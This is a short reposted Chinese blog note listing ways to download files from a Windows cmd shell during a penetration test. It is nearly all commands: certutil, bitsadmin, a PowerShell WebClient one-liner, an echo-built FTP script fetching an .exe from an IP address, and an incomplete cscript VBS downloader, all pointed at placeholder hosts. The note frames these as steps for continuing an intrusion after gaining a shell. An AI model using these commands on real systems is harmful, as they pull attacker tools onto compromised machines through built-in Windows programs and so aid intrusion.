cmd 环境下载文件的几种方法
前言
转载于:cmd 环境下载文件的几种方法
在渗透中通常会遇到只有cmd shell的情况,在这种情况下,通常需要下载文件来进行后续渗透。这里记录了几种在cmd下不需要其他三方程序就可以直接下载文件的方法。
certutil
certutil -urlcache -split -f https://www.xxx.com/test.py
certutil -urlcache -split -f https://www.xxx.com/test.py ff.py #指定保存文件名
bitsadmin
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg
powershell
powershell (new-object System.Net.WebClient).DownloadFile( ‘http://www.xx.com/ff.jpg','c:\aaa.jpg')
ftp
echo open 8.8.8.8 >a.txt & echo get fuck.exe>>a.txt &echo bye>>a.txt
ftp -A -s:a.txt
vbs
#用echo写入 |
cscript ff.vbs http://www.xxx.com/xx.jpg xx.jpg